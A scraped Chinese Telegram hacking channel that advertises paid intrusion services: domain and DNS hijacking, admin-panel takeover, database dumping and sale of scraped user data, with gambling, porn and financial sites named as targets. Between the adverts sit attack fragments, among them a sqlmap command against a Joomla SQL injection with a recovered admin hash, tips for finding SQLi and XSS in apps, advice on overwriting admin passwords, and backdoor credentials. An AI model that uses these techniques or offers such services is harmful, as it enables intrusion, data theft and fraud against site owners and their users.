黑客渗透 金融劫持 BC域名跳转
17.7K subscribers
1.8K photos
19 videos
2 files
162 links
金融股民渗透国内app,海外网站app,入侵后台,脱裤数据库, dns劫持 服务器进入等等
破解网站app软件技术等等 黑客技术咨询
@hacker_HouZiM
Download Telegram
sqlmap -u "http://192.168.122.135/index.php?option=com_fields&view=fields&layout=modal&list
[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --col
umns -p list[fullordering]
ization. For non-commercial use, please indicate the source.


最后查这几个字段的数据,成功查出来用户名为admin和密码的hash值$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
2👍1
但是使用SpringBoot敏感目录字典扫描后发现,就连接口文档swagger-ui.html也删除的干干净净。
1👍1
此漏洞的挖掘到这里也可以结束了,但是回过头来才发现,一开始筛选出6个接口时,如果更细心、更脑洞大开一点的话,或许直接拼接也不用走那么多弯路。在审计JavaScript的代码逻辑中data_marxxx与cloud拼接了,但是面对如此复杂并且杂乱的JavaScript代码
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
1👍1
手机银行APP在运行过程中,用户进行转账、汇款等交易时的账号,开户行等敏感数据信息在写入移动终端内存时,XSS漏可利用技术手段进行篡改,使得原本要转给亲友或企业的资金被转入指定的账户。
1👍1
入侵bc后台权限 superadmin
后台管理设置


各类网站关键词 可劫持 加单中....
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
1👍1
六合彩流量
👍3
This media is not supported in your browser
VIEW IN TELEGRAM
渗透服务,是以入侵者的思维方式,结合渗透工具、攻击代码及溢出利用技术,模拟入侵者可能利用的途径,发现网络、系统、应用存在的安全隐患,从而提高相关人员对安全的认识,让他们了解信息系统存在的潜在风险、被忽视的安全漏洞、目前防护的效果及应注意改进的防范措施
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
1👍1
This media is not supported in your browser
VIEW IN TELEGRAM
BC数据劫持 六合彩域名劫持 六合彩后台数据入侵获取数据
2
漏洞描述[^1]
漏洞出自BN_mod_sqrt()接口函数,它用于计算模平方根,且期望参数p应该是个质数,但是函数内并没有进行检查,这导致内部可能出现无限循环。这个函数在解析如下格式的证书时会被用到:

证书包含压缩格式的椭圆曲线公钥时
证书带有显式椭圆曲线参数,其基点是压缩格式编码的
总之,在解析证书时需要对点坐标进行解压缩操作的就会调用到这个函数。所以外部可以通过精心构造一个具有非法的显式曲线参数的证书来触发无限循环,从而造成DoS拒绝服务攻击。
1👍1
指定app应用 抓取数据

全行业 全平台数据都可以抓取

贷款 POS 股票 期货 医美 六合 棋牌 教育 菠莱 体育 等等

提供你所需指定的平台网址链接给我这边工作室技术抓取数据接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
👍2
体育赌博,体育足球比赛博彩,体育充值客户。体育运动赛事,足球博彩料。体育精准活跃客户。可以按照手机号归属地 筛选地区
👍21
在一个数据表中找到后台登录的用户密码,很幸运密码直接就能用cmd5爆破出来。当然爆破不出来也没事,直接把我们自己的密码md5后直接修改数据表。
2👍1
在app里面抓包,查找邮箱,充值,的地方寻找sql注入或者意见反馈的位置XSS
1👍1
Media is too big
VIEW IN TELEGRAM
DNS流量转流量持持跳转运营商持域名跳转!
适合以下这几种行业!
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
2👍1
这种菠菜类的网站 大多数 服务器都是防范级别很高的 都是包网 资产很多 而且前后端都是分离的 有的时候 没有思路的时候 可以从运维方面下手 有的运维安全意识不是很高 还可以从C段入手 因为有的菠菜资产分布在几个C段 主站上面 肯定很少漏洞 基本上可以说没有 还有就是从游戏接口入手 或者游戏逻辑入手 个人一点点粗见。
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
3👍1
LoadConfig 函数主要解析附加在二进制文件末尾的数据块,加载远控木马的配置。解压后的加密数据占用 166 个字节,分为三部分:加密数据、AES 密钥和两字节的块大小。darwinx64 检查释放在 /tmp文件夹中的 Payload 时,会发现该二进制文件没有任何符号。与此同时,通过 sections 列表可以发现该文件使用 UPX
1👍1
详细信息 - Samba 中的后门账户
Samba 配置为默认运行,并且/bin/genpasswd程序配置不同的账户。

从IDA截图中可以看到,创建了多个后门账户:

admin,密码为 1234
支持密码 1234
密码为 1234 的用户
1🔥1